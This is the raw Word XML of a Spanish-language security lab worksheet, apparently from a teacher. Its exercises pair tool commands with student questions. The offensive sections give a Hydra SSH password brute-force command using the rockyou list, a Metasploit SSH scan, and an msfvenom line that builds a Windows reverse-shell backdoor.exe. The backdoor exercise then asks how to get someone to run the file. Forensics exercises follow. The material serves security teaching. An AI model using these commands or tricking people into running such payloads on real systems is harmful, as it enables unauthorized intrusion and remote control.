    <w:p w14:paraId="094CC413" w14:textId="77777777" w:rsidR="00291688" w:rsidRPr="00291688" w:rsidRDefault="00291688" w:rsidP="00291688">
      <w:r w:rsidRPr="00291688">
        <w:t>hydra -l admin -P /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00291688">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00291688">
        <w:t xml:space="preserve">/share/wordlists/rockyou.txt &lt;IP_DEL_OBJETIVO&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00291688">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="610AB86F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¿Lograste encontrar credenciales válidas?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7352689E" w14:textId="77777777" w:rsidR="00291688" w:rsidRPr="00291688" w:rsidRDefault="00000000" w:rsidP="00291688">
      <w:r>
        <w:pict w14:anchorId="4EAC2D67">
          <v:rect id="_x0000_i1039" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B845DA0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5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Escanear vulnerabilidades con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00291688">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="60089013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bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="438C17A5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CopiarEditar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7074009C" w14:textId="77777777" w:rsidR="00291688" w:rsidRPr="00291688" w:rsidRDefault="00291688" w:rsidP="00291688">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00291688">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2D48618D" w14:textId="77777777" w:rsidR="00291688" w:rsidRPr="00291688" w:rsidRDefault="00291688" w:rsidP="00291688">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00291688">
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00291688">
        <w:t xml:space="preserve"> &gt; use auxiliary/scanner/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00291688">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00291688">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00291688">
        <w:t>ssh_version</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4CD321E2" w14:textId="77777777" w:rsidR="00291688" w:rsidRPr="00291688" w:rsidRDefault="00291688" w:rsidP="00291688">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00291688">
        <w:lastRenderedPageBreak/>
        <w:t>msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00291688">
        <w:t xml:space="preserve"> &gt; set RHOSTS &lt;IP_DEL_OBJETIVO&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC7B5C3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msf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00291688">
        <w:rPr>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A94F1CD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¿Qué versión de SSH está instalada en el objetivo?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0D17E4" w14:textId="77777777" w:rsidR="00291688" w:rsidRPr="00291688" w:rsidRDefault="00000000" w:rsidP="00291688">
      <w:r>
        <w:pict w14:anchorId="3E56B18B">
          <v:rect id="_x0000_i1040" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="345A7E8A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6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Crear un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00291688">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00291688">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t xml:space="preserve"> con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00291688">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0EB53F97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bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5A5533F5" w14:textId="77777777" w:rsidR="00291688" w:rsidRPr="00291688" w:rsidRDefault="00291688" w:rsidP="00291688">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00291688">
        <w:t>CopiarEditar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="11B72F60" w14:textId="77777777" w:rsidR="00291688" w:rsidRPr="00291688" w:rsidRDefault="00291688" w:rsidP="00291688">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00291688">
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00291688">
        <w:t xml:space="preserve"> -p windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00291688">
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00291688">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00291688">
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00291688">
        <w:t xml:space="preserve"> LHOST=&lt;TU_IP&gt; LPORT=4444 -f exe &gt; backdoor.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BA12288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¿Cómo podrías hacer que alguien ejecute este archivo?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB69F23" w14:textId="77777777" w:rsidR="00291688" w:rsidRPr="00291688" w:rsidRDefault="00000000" w:rsidP="00291688">
      <w:r>
        <w:pict w14:anchorId="1EE5F545">
          <v:rect id="_x0000_i1041" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C03D27E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rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00291688">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sección 5: Forense Digital</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AED7E9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7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Extraer metadatos de una imagen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139DB899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bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="24BF8CD7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CopiarEditar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="638AE3FA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exiftool</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00291688">
        <w:rPr>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t xml:space="preserve"> imagen.jpg</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6258DFC9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¿Qué información se obtuvo?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068E066D" w14:textId="77777777" w:rsidR="00291688" w:rsidRPr="00291688" w:rsidRDefault="00000000" w:rsidP="00291688">
      <w:r>
        <w:pict w14:anchorId="76FF0E63">
          <v:rect id="_x0000_i1042" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1199465D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8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Analizar tráfico de red con Wireshark</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="402D0B31" w14:textId="77777777" w:rsidR="00291688" w:rsidRPr="00291688" w:rsidRDefault="00291688" w:rsidP="00291688">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-CR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00291688">
        <w:rPr>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t>Abre Wireshark y captura tráfico en tu interfaz de red.</w:t>
      </w:r>
      <w:r w:rsidRPr="00291688">
        <w:rPr>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:br/>
      </w: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¿Qué tipo de paquetes puedes ver?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B13337D" w14:textId="77777777" w:rsidR="00291688" w:rsidRPr="00291688" w:rsidRDefault="00000000" w:rsidP="00291688">
      <w:r>
        <w:pict w14:anchorId="31D7E041">
          <v:rect id="_x0000_i1043" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAB1056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1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9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Recuperar archivos eliminados con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00291688">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t>Foremost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1F9E897D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bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="200D3683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CopiarEditar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="35F0F89C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foremost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00291688">
        <w:rPr>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t xml:space="preserve"> -i </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00291688">
        <w:rPr>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t>disco.img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00291688">
        <w:rPr>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00291688">
        <w:rPr>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00291688">
        <w:rPr>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t xml:space="preserve"> output/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787E5B46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lastRenderedPageBreak/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¿Pudiste recuperar algún archivo?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22808E22" w14:textId="77777777" w:rsidR="00291688" w:rsidRPr="00291688" w:rsidRDefault="00000000" w:rsidP="00291688">
      <w:r>
        <w:pict w14:anchorId="41C2F3DB">
          <v:rect id="_x0000_i1044" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D97203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rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔹</w:t>
      </w:r>
      <w:r w:rsidRPr="00291688">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sección 6: Herramientas Extras</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F7B7C2" w14:textId="77777777" w:rsidR="00291688" w:rsidRPr="00291688" w:rsidRDefault="00291688" w:rsidP="00291688">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-CR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00291688">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t>2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>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00291688">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>️</w:t>
      </w:r>
      <w:r w:rsidRPr="00291688">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t>⃣</w:t>
      </w:r>
      <w:r w:rsidRPr="00291688">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Crear un diccionario personalizado con Crunch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225138B6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bash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="20F9708A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CopiarEditar</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1C5F307B" w14:textId="77777777" w:rsidR="00291688" w:rsidRPr="00291688" w:rsidRDefault="00291688" w:rsidP="00291688">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-CR"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00291688">
        <w:rPr>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t>crunch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00291688">
        <w:rPr>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t xml:space="preserve"> 8 8 abcdef123 -o diccionario.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD3AA11" w14:textId="77777777" w:rsidR="00291688" w:rsidRPr="00291688" w:rsidRDefault="00291688" w:rsidP="00291688">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-CR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00291688">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t>✍</w:t>
      </w:r>
      <w:r w:rsidRPr="00291688">
        <w:t>️</w:t>
      </w:r>
      <w:r w:rsidRPr="00291688">
        <w:rPr>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00291688">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t>Pregunta:</w:t>
      </w:r>
      <w:r w:rsidRPr="00291688">
        <w:rPr>
          <w:lang w:val="es-CR"/>
        </w:rPr>
        <w:t xml:space="preserve"> ¿Cuántas combinaciones generó el diccionario?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FEF989" w14:textId="77777777" w:rsidR="006E6C5E" w:rsidRPr="00291688" w:rsidRDefault="006E6C5E">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-CR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="006E6C5E" w:rsidRPr="00291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88"/>
    <w:rsid w:val="00205F5F"/>
    <w:rsid w:val="00291688"/>
    <w:rsid w:val="0032155A"/>
    <w:rsid w:val="003C2103"/>
    <w:rsid w:val="004557EC"/>
    <w:rsid w:val="004B05EC"/>
    <w:rsid w:val="006E6C5E"/>
    <w:rsid w:val="00982552"/>
    <w:rsid w:val="00C933AD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43C9"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{78091956-42BD-4706-B80E-23F6A912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6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6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6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6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6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6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1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1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6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16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6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6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1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Mora</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>PC Profesor</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-04-01T18:27:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-02T17:08:00Z</dcterms:modified>
</cp:coreProperties>
</file>